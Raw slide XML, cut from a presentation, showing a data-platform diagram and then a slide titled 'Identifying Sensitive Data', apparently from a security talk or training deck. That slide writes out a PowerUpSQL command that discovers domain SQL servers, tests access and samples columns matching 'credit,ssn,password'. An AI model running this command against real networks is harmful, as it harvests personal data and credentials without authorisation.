          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="13" name="Straight Connector 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{32E65F20-16B8-40BC-BAF4-7DADBFC93569}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1811147" y="1980108"/>
            <a:ext cx="0" cy="3047660"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1">
                <a:alpha val="50000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter lim="800000"/>
            <a:tailEnd type="none"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="14" name="Straight Connector 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3AD90A6D-6D8D-419C-B339-AE2839B25280}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7124031" y="1969423"/>
            <a:ext cx="0" cy="3047660"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1">
                <a:alpha val="50000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter lim="800000"/>
            <a:tailEnd type="none"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Rectangle 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D8C5793-F2EB-42A1-A588-DE6AC7E9A8B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8401607" y="2125663"/>
            <a:ext cx="3328430" cy="1484312"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="10795" cap="flat" cmpd="sng" algn="ctr">
            <a:noFill/>
            <a:prstDash val="solid"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="137160" tIns="89642" rIns="137160" bIns="89642" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="914049">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Business intelligence</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Rectangle 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{932DAFCA-FE9C-4C76-B015-5C67A7889C21}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8396845" y="3590925"/>
            <a:ext cx="3337955" cy="1424166"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="10795" cap="flat" cmpd="sng" algn="ctr">
            <a:noFill/>
            <a:prstDash val="solid"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="137160" tIns="89642" rIns="137160" bIns="89642" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="914049">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Advanced analytics &amp; AI</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Rectangle 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A508E1F0-5D17-4BDB-A30F-82479BA2EF5A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="4317673"/>
            <a:ext cx="7905750" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:miter lim="800000"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="228600" tIns="91440" rIns="0" bIns="0" rtlCol="0" anchor="ctr" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="914049">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Big data processing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Rectangle 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B4A5197-3B51-4B54-9C93-2C48749847F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="460062" y="3349523"/>
            <a:ext cx="7883838" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:miter lim="800000"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="228600" tIns="91440" rIns="0" bIns="0" rtlCol="0" anchor="ctr" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="914049">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" kern="0">
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Data warehousing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Rectangle 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF2E914D-4F5F-4073-9374-1FD0A257C840}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="460235" y="2390717"/>
            <a:ext cx="7902715" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:miter lim="800000"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="228600" tIns="91440" rIns="0" bIns="0" rtlCol="0" anchor="ctr" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="914049">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" kern="0">
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Operational data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Rectangle 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95704D4A-4092-44C3-9409-B9005AF15BB4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="452286" y="5910764"/>
            <a:ext cx="11284066" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:miter lim="800000"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="228600" tIns="91440" rIns="0" bIns="0" rtlCol="0" anchor="ctr" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="914049">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" kern="0">
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Flexibility</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Rectangle 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A523FE63-32D2-445C-9D9A-6550F6086C2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="444503" y="5191318"/>
            <a:ext cx="11284066" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:miter lim="800000"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="228600" tIns="91440" rIns="0" bIns="0" rtlCol="0" anchor="ctr" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="914049">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Security</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Rectangle 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5B49017-3469-4998-BE16-418396CF7A4B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457201" y="1400586"/>
            <a:ext cx="11284066" cy="77065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lgn="ctr" defTabSz="932472" fontAlgn="base">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:srgbClr val="FFFFFF"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="FFFFFF"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
                <a:ea typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Security</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38241329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B630-4F9D-3F41-B272-6930F7F8F148}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Identifying</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> Sensitive Data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0C971AB-4336-FE41-9871-432E27B39C05}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Some</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>key</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>indicators</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> sensitive </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>databases</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>size</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>utilization</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> transparent </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>encryption</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="cs-CZ" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Both</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>could</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>possibly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>indicate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> a database holding sensitive data. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Regular</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>expressions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>can</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>certainly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>assist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>filtering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> data and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>then</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>identifying</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> sensitive </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>information</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="cs-CZ" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>For</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>example</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>, to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>identify</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> sensitive data in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>all</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>accessible</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>databases</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>we</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>discovered</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>we</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>can</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>execute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>following</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{863F853D-F8DF-8641-A6C3-87DCBC77B5B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="541173" y="4197085"/>
            <a:ext cx="11041227" cy="6669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&gt;&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Get-SQLInstanceDomain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Get-SQLConnectionTest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>GetSQLColumnSampleDataThreaded</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Verbose</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Threads</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> 10 -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Keyword</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>credit,ssn,password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>" -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>SampleSize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> 2 -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0" err="1">
